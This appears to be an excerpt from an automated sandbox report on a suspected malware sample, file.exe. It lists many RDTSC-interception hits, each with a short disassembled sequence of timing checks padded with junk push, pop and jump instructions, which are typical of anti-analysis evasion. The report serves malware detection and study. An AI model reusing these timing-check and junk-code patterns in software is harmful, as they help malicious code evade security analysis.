              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE61F second address: 7FE697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FBF65139598h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push esi 0x00000025 mov ebx, dword ptr [ebp+12477199h] 0x0000002b pop edi 0x0000002c movsx edi, ax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FBF65139598h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b add dword ptr [ebp+12480156h], edx 0x00000051 push 00000000h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push edi 0x00000056 jnc 00007FBF65139596h 0x0000005c pop edi 0x0000005d push esi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE697 second address: 7FE6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jg 00007FBF65139DACh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD906 second address: 7FD90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD90C second address: 7FD938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jng 00007FBF65139DA6h 0x0000000f jmp 00007FBF65139DB4h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007FBF65139DA6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD938 second address: 7FD93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801547 second address: 80154B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80154B second address: 801554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806491 second address: 806499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806499 second address: 8064A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FBF65139596h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8064A7 second address: 8064AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805B57 second address: 805B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805B61 second address: 805B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FBF65139DB8h 0x0000000b jmp 00007FBF65139DB0h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805EA3 second address: 805EB1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF65139596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805EB1 second address: 805EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF65139DA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806000 second address: 806020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBF65139596h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FBF6513959Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806020 second address: 806042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FBF65139DA6h 0x0000000c jmp 00007FBF65139DB4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806042 second address: 80604D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF65139596h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80604D second address: 806053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806053 second address: 80608B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A9h 0x00000007 jmp 00007FBF651395A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007FBF65139596h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810066 second address: 810078 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBF65139DAAh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EE09 second address: 80EE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF65139596h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FBF6513959Fh 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EE2D second address: 80EE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FBF65139DA6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EE3A second address: 80EE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBF651395A8h 0x0000000b jng 00007FBF65139596h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EE60 second address: 80EE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EE66 second address: 80EE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBF651395A3h 0x00000010 popad 0x00000011 jno 00007FBF6513959Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EE95 second address: 80EE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EE99 second address: 80EEA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FBF65139596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F38B second address: 80F3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FBF65139DB0h 0x0000000e push ebx 0x0000000f jmp 00007FBF65139DAAh 0x00000014 jmp 00007FBF65139DADh 0x00000019 pop ebx 0x0000001a popad 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBF65139DB8h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F79A second address: 80F79E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F904 second address: 80F913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBF65139DAAh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FAAE second address: 80FAB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FAB7 second address: 80FABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FF3C second address: 80FF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jne 00007FBF65139596h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815768 second address: 81576C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81576C second address: 815772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815772 second address: 815778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81447A second address: 81448A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FBF65139596h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81448A second address: 8144AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBF65139DAEh 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007FBF65139DA6h 0x00000016 jmp 00007FBF65139DAFh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8144AF second address: 8144BF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF651395A2h 0x00000008 jno 00007FBF65139596h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8147B0 second address: 8147B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8155B9 second address: 8155BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8155BF second address: 8155C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8155C4 second address: 8155DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8155DF second address: 8155ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF65139DA6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8155ED second address: 8155F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8155F2 second address: 8155FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BD19 second address: 81BD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF65139596h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BD23 second address: 81BD40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65139DB3h 0x00000007 jo 00007FBF65139DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EA5C second address: 79EA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF6513959Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ABB8 second address: 81ABBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ABBE second address: 81ABE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651395A2h 0x00000007 jmp 00007FBF6513959Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B130 second address: 81B14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65139DB7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B14B second address: 81B15A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF6513959Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81A763 second address: 81A76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B443 second address: 81B447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B756 second address: 81B760 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF65139DB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B760 second address: 81B766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AD23 second address: 82AD30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBDC8 second address: 7EBDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC226 second address: 7EC239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FBF65139DA8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC38E second address: 7EC393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC393 second address: 7EC399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC399 second address: 7EC39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC64E second address: 7EC66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dx, 80B4h 0x0000000c push 00000004h 0x0000000e mov edx, dword ptr [ebp+122D36E3h] 0x00000014 push eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FBF65134596h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECA85 second address: 7ECA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECA8A second address: 7ECA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECA90 second address: 7ECA94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECD83 second address: 7ECD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ECD87 second address: 7ECD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A15D second address: 82A163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A163 second address: 82A194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FBF65561B61h 0x0000000b pop ebx 0x0000000c jl 00007FBF65561B52h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A704 second address: 82A72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007FBF65134596h 0x0000000c popad 0x0000000d jmp 00007FBF651345A5h 0x00000012 jo 00007FBF6513459Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A72E second address: 82A74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF65561B55h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A74F second address: 82A753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A753 second address: 82A77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FBF65561B46h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A77C second address: 82A780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A8EF second address: 82A90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF65561B46h 0x0000000a jmp 00007FBF65561B4Ch 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82A90E second address: 82A912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D0E7 second address: 82D0F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FBF65561B4Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D0F8 second address: 82D115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 je 00007FBF65134596h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jnc 00007FBF65134596h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC4E second address: 82CC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC52 second address: 82CC58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC58 second address: 82CC60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CC60 second address: 82CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F763 second address: 82F769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FA1D second address: 82FA31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBF65134596h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FA31 second address: 82FA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FA35 second address: 82FA3F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF65134596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FBD3 second address: 82FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FBD7 second address: 82FBF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 jne 00007FBF65134596h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FBF65134596h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 832088 second address: 83209E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FBF65561B46h 0x00000010 jnl 00007FBF65561B46h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83209E second address: 8320B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF6513459Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83856D second address: 838571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838571 second address: 83857A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836EC0 second address: 836EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
